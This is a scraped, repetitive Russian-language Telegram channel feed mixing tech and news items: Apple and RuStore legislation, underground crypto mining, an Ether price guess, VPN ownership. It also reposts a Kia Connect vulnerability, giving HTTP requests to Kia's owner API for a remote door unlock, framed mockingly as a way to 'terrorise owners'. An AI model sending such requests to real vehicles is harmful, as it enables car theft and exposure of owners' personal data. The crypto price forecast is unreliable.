Гори в аду тот мудак, который придумал писать в критические ошибки ОТМЕНУ ДЕЙСТВИЯ ПОЛЬЗОВАТЕЛЕМ.
Кстати, @tass_agency пишет:
Посмотрим на то, что будет делать Apple, так как формально они соблюдают требования РФ.
Правительство России поддержало законопроект, который обяжет Apple разрешить установку российского магазина приложений RuStore, а также скачивание отечественных программ, платежи и другие функции. Однако парламентариям предложено доработать документ с учетом замечаний кабмина.
Посмотрим на то, что будет делать Apple, так как формально они соблюдают требования РФ.
Telegram
ТАСС
Правительство России поддержало законопроект, который обяжет Apple разрешить установку российского магазина приложений RuStore, а также скачивание отечественных программ, платежи и другие функции. Однако парламентариям предложено доработать документ с учетом…
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from vx-underground
We aren't surprised, we're surprised it took this long. Pavel Durov is a citizen of France, a NATO country.
Forwarded from Ньюсач/Двач
This media is not supported in your browser
VIEW IN TELEGRAM
Залезли полицейские в подвал, а там дагестанцы крипту майнят: владельцы майнинг-ферм в Дагестане начали устанавливать аппараты для незаконной добычи криптовалюты под землёй
Владельцы установки разместили под землёй более 15 аппаратов, сообщили в правоохранительных органах.
Владельцы установки разместили под землёй более 15 аппаратов, сообщили в правоохранительных органах.
Включаю крипто-жабу
6-9 числа эфир снова рухнет до
198-208к,20-23 числах поднимется до
248-256к.Если это будет так - это будет забавно.
Обязательно отпишусь об этом.
Achtung:
Играть на этом - не советую. Сказанное не является инвестиционной рекомендацией.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пекарня
Кроме кота по кличке «Хуй» в титрах Space Marine 2 заметили другие «необычные» имена питомцев разработчиков. Среди них:
🔴 Еблуша
🔴 Мусорка
🔴 Кошка номер три
Разбираем
Разбираем
Please open Telegram to view this post
VIEW IN TELEGRAM
ШТИРЛЕЦ ДАВНО НЕ БЫЛ ТАК БЛИЗКО К ПРОВАЛУ
(pango.co официально владелец большинства популярных VPN серверов, таких как UltaVPN, VPN360, BetterNet, OVPN, COSMOVPN, а так же UltraAV :DDDD)
(pango.co официально владелец большинства популярных VPN серверов, таких как UltaVPN, VPN360, BetterNet, OVPN, COSMOVPN, а так же UltraAV :DDDD)
Ключик Киа получить просто:
Терроризируем владельцев.
Список попавших с 2025 модельного по 2018:
https://samcurry.net/hacking-kia
Там же подробные инструкции атаки.
POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;
Делаем реквест к открытию двери:
GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e
Получаем ВИНуид.Терроризируем владельцев.
Список попавших с 2025 модельного по 2018:
https://samcurry.net/hacking-kia
Там же подробные инструкции атаки.
Forwarded from НеКасперский
Media is too big
VIEW IN TELEGRAM
Корейцы делают вещи
Высинилось, что большую часть KIA, выпущенных с 2014 года можно было взломать и угнать меньше чем за 30 секунд.
Да, в два раза быстрее, чем в фильме. Все машины, что поддерживали KIA Connect не были должным образом защищены. Причём не имело значение, есть ли у владельца авто подписка на сервис или нет.
Проблема свелась к корневому дилерскому центру KIA, который активировал машины. Через его API можно было создать фиктивный аккаунт и получать токены уже для доступа к KIA Connect. Злоумышленники получали доступ к камерам, функциям блокировки, удалённого запуска, геолокации, иллюминации и сигналу авто. Более того, через приложение раскрывали данные и о владельце: его имени, телефона, адреса и посты.
Нагляднее всего продемонстрировали эксплойт KIA Tool журналисты из Wierd, взломавшие машину одного из своих коллег.
Владельцев Stinger поздравляем, все модели до 2022 года почти никак не пострадали: у большинства можно узнать только геопозицию.
НеКасперский
Высинилось, что большую часть KIA, выпущенных с 2014 года можно было взломать и угнать меньше чем за 30 секунд.
Да, в два раза быстрее, чем в фильме. Все машины, что поддерживали KIA Connect не были должным образом защищены. Причём не имело значение, есть ли у владельца авто подписка на сервис или нет.
Проблема свелась к корневому дилерскому центру KIA, который активировал машины. Через его API можно было создать фиктивный аккаунт и получать токены уже для доступа к KIA Connect. Злоумышленники получали доступ к камерам, функциям блокировки, удалённого запуска, геолокации, иллюминации и сигналу авто. Более того, через приложение раскрывали данные и о владельце: его имени, телефона, адреса и посты.
Нагляднее всего продемонстрировали эксплойт KIA Tool журналисты из Wierd, взломавшие машину одного из своих коллег.
Владельцев Stinger поздравляем, все модели до 2022 года почти никак не пострадали: у большинства можно узнать только геопозицию.
НеКасперский